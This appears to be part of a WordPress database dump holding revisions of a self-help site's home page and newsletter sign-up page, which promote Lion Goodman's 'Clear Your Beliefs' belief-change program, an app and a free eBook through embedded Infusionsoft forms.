(1627, 2, '2014-10-24 02:47:37', '2014-10-24 07:47:37', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my belief so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 02:47:37', '2014-10-24 07:47:37', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1629, 2, '2014-10-24 03:05:34', '2014-10-24 08:05:34', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;margin-top: 37px;font-size: 18px"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center;margin-top: 37px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 30px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my belief so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 03:05:34', '2014-10-24 08:05:34', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1630, 2, '2014-10-24 03:09:47', '2014-10-24 08:09:47', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: 10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 03:09:47', '2014-10-24 08:09:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1634, 2, '2014-10-28 13:15:08', '2014-10-28 18:15:08', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;">\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.34.0.44" />\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: right;"></div>\r\n<div class="infusion-submit" style="text-align: right;"><input style="margin: 30px auto;" type="submit" value="GET ACCESS NOW" /></div>\r\n</div>\r\n', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 13:15:08', '2014-10-28 18:15:08', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1632, 2, '2014-10-28 13:11:33', '2014-10-28 18:11:33', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;">\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.29.11.21" />\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n<div class="infusion-field" style="text-align: center;"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n<div class="infusion-field" style="text-align: right;"></div>\r\n<div class="infusion-submit" style="text-align: right;"><input style="margin: 30px auto;" type="submit" value="Submit" /></div>\r\n</div>\r\n\r\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/04f73722bf7196ce6789ed3e003f8218" class="infusion-form" method="POST">\r\n    <input name="inf_form_xid" type="hidden" value="04f73722bf7196ce6789ed3e003f8218" />\r\n    <input name="inf_form_name" type="hidden" value="Sign up for newsletter" />\r\n    <input name="infusionsoft_version" type="hidden" value="1.34.0.44" />\r\n    <div class="infusion-field">\r\n        <label for="inf_field_FirstName">First Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">Email *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <input type="submit" value="GET ACCESS NOW" />\r\n    </div>\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 13:11:33', '2014-10-28 18:11:33', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1633, 2, '2015-05-12 18:04:19', '2015-05-12 23:04:19', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\n\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\n<div class="videoWrapper">\n\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\n\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\n\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\n\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\n\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\n\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\n\n\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\n</center> [/su_box]\n\n\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-autosave-v1', '', '', '2015-05-12 18:04:19', '2015-05-12 23:04:19', '', 588, 'http://clearyourbeliefs.com/588-autosave-v1', 0, 'revision', '', 0),
(1855, 2, '2014-11-30 18:09:50', '2014-11-30 23:09:50', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Get Lion''s Free eBook:  Clear Your Beliefs!', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-11-30 18:09:50', '2014-11-30 23:09:50', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1640, 2, '2014-10-28 13:28:24', '2014-10-28 18:28:24', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 13:28:24', '2014-10-28 18:28:24', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1639, 2, '2014-10-28 13:27:46', '2014-10-28 18:27:46', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/04f73722bf7196ce6789ed3e003f8218" class="infusion-form" method="POST">\r\n    <input name="inf_form_xid" type="hidden" value="04f73722bf7196ce6789ed3e003f8218" /><input name="inf_form_name" type="hidden" value="Sign up for newsletter" /> <input name="infusionsoft_version" type="hidden" value="1.34.0.44" /> <div class="infusion-field"> <label for="inf_field_FirstName">First Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">Email *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <input type="submit" value="GET ACCESS NOW" />\r\n    </div>\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center></div>\r\n\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></center></div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 13:27:46', '2014-10-28 18:27:46', '', 588, 'http://clearyourbeliefs.com/588-revision-v1', 0, 'revision', '', 0),
(1635, 2, '2014-10-28 13:18:23', '2014-10-28 18:18:23', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" />Sign Up for the Clear Your Beliefs Newsletter</h1>\r\nGet a free copy of Lion’s multimedia eBook, <em>“Transform Your Beliefs: Unleash Your Magnificence and Change Your World"</em>.\r\n\r\nIt details the wisdom behind the <em>BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior.  It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email immediately with the download link, and you’ll also receive Lion’s periodic newsletter about belief-change and transformation.  Your contact information will never be shared, and you can un-subscribe anytime.  We look forward to being in touch!\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;">\r\n\r\n<center><form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/04f73722bf7196ce6789ed3e003f8218" class="infusion-form" method="POST">\r\n    <input name="inf_form_xid" type="hidden" value="04f73722bf7196ce6789ed3e003f8218" />\r\n    <input name="inf_form_name" type="hidden" value="Sign up for newsletter" />\r\n    <input name="infusionsoft_version" type="hidden" value="1.34.0.44" />\r\n    <div class="infusion-field">\r\n        <label for="inf_field_FirstName">First Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">Email *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" type="text" />\r\n    </div>\r\n    <div class="infusion-submit">\r\n        <input type="submit" value="GET ACCESS NOW" />\r\n    </div>\r\n</form>\r\n<script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center></div>', 'Sign Up for the Clear Your Beliefs Newsletter', '', 'inherit', 'closed', 'open', '', '588-revision-v1', '', '', '2014-10-28 